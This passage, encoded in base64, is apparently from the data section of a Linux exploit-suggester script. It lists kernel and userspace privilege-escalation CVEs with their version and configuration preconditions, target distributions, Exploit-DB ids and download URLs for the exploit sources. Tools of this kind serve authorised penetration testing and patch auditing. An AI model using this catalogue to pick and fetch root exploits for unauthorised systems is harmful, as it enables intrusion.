R7dHh0cnN0fSBQSUVfc3RhY2tfY29ycnVwdGlvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMyx4ODZfNjQKVGFnczogUkhFTD02LFJIRUw9N3trZXJuZWw6My4xMC4wLTUxNC4yMS4yfDMuMTAuMC01MTQuMjYuMX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLnR4dApzcmMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDkvMjYvbGludXgtcGllLWN2ZS0yMDE3LTEwMDAyNTMvY3ZlLTIwMTctMTAwMDI1My5jCmV4cGxvaXQtZGI6IDQyODg3CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTUzMzNdJHt0eHRyc3R9IHJkc19hdG9taWNfZnJlZV9vcCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuMTMsY21kOmdyZXAgLXFpIHJkcyAvcHJvYy9tb2R1bGVzLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wfDQuOC4wfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vd2Jvd2xpbmcvOWQzMjQ5MmJkOTZkOWU3YzNiZjUyZTIzYTBhYzMwYTQvcmF3Lzk1OTMyNTgxOWM3ODI0OGE2NDM3MTAyYmIyODliYjg1NzhhMTM1Y2QvY3ZlLTIwMTgtNTMzMy1wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTgtNTMzMy9jdmUtMjAxOC01MzMzLmMKQ29tbWVudHM6IHJkcy5rbyBrZXJuZWwgbW9kdWxlIG5lZWRzIHRvIGJlIGxvYWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIHRhcmdldHMgYW5kIGJ5cGFzc2luZyBLQVNMUi4KYXV0aG9yOiB3Ym93bGluZyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xODk1NV0ke3R4dHJzdH0gc3VidWlkX3NoZWxsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjE1LHZlcjw9NC4xOS4yLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLGNtZDpbIC11IC91c3IvYmluL25ld3VpZG1hcCBdLGNtZDpbIC11IC91c3IvYmluL25ld2dpZG1hcCBdClRhZ3M6IHVidW50dT0xOC4wNHtrZXJuZWw6NC4xNS4wLTIwLWdlbmVyaWN9LGZlZG9yYT0yOHtrZXJuZWw6NC4xNi4zLTMwMS5mYzI4fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE3MTIKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NzEzMy56aXAKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEzMjcyL3BvYy5jCkNvbW1lbnRzOiBSZXF1aXJlcyBhbiBhY3RpdmUgUG9sS2l0IGFnZW50LgpleHBsb2l0LWRiOiA0NzEzMwpleHBsb2l0LWRiOiA0NzE2MwphdXRob3I6IEphbm4gSG9ybiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xNTY2Nl0ke3R4dHJzdH0gWEZSTV9VQUYKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMsdmVyPDUuMC4xOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MSxDT05GSUdfWEZSTT15ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2R1YXN5bnQuY29tL2Jsb2cvdWJ1bnR1LWNlbnRvcy1yZWRoYXQtcHJpdmVzYwpiaW4tdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZHVhc3ludC94ZnJtX3BvYy9yYXcvbWFzdGVyL2x1Y2t5MApDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZDsgQ09ORklHX1hGUk0gbmVlZHMgdG8gYmUgZW5hYmxlZAphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjczNjVdJHt0eHRyc3R9IGxpbnV4LWlzY3NpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD01LjExLjMsQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQhPXkKVGFnczogUkhFTD04ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuZ3JpbW0tY28uY29tLzIwMjEvMDMvbmV3LW9sZC1idWdzLWluLWxpbnV4LWtlcm5lbC5odG1sCnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9ncmltbS1jby9Ob3RRdWl0ZTBEYXlGcmlkYXkvemlwL3RydW5rCkNvbW1lbnRzOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRCBtdXN0IG5vdCBiZSBlbmFibGVkCmF1dGhvcjogR1JJTU0KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0zNDkwXSR7dHh0cnN0fSBlQlBGIEFMVTMyIGJvdW5kcyB0cmFja2luZyBmb3IgYml0d2lzZSBvcHMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTUuNyx2ZXI8NS4xMixDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0oMjV8MjZ8Mjd8Mjh8Mjl8MzB8MzF8MzJ8MzN8MzR8MzV8MzZ8Mzd8Mzh8Mzl8NDB8NDF8NDJ8NDN8NDR8NDV8NDZ8NDd8NDh8NDl8NTB8NTF8NTIpLSp9LHVidW50dT0yMS4wNHtrZXJuZWw6NS4xMS4wLTE2LSp9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5ncmFwbHNlY3VyaXR5LmNvbS9wb3N0L2tlcm5lbC1wd25pbmctd2l0aC1lYnBmLWEtbG92ZS1zdG9yeQpzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vY2hvbXBpZTEzMzcvTGludXhfTFBFX2VCUEZfQ1ZFLTIwMjEtMzQ5MC96aXAvbWFpbgpDb21tZW50czogQ09ORklHX0JQRl9TWVNDQUxMIG5lZWRzIHRvIGJlIHNldCAmJiBrZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCAhPSAxCmF1dGhvcjogY2hvbXBpZTEzMzcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0yMjU1NV0ke3R4dHJzdH0gTmV0ZmlsdGVyIGhlYXAgb3V0LW9mLWJvdW5kcyB3cml0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE5LHZlcjw9NS4xMi1yYzYKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGUuZ2l0aHViLmlvL3NlY3VyaXR5LXJlc2VhcmNoL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvd3JpdGV1cC5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9nb29nbGUvc2VjdXJpdHktcmVzZWFyY2gvbWFzdGVyL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvZXhwbG9pdC5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAyMS0yMjU1NS9leHBsb2l0LmMKQ29tbWVudHM6IGlwX3RhYmxlcyBrZXJuZWwgbW9kdWxlIG11c3QgYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDUwMTM1CmF1dGhvcjogdGhlZmxvdyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMPTV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTEtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjM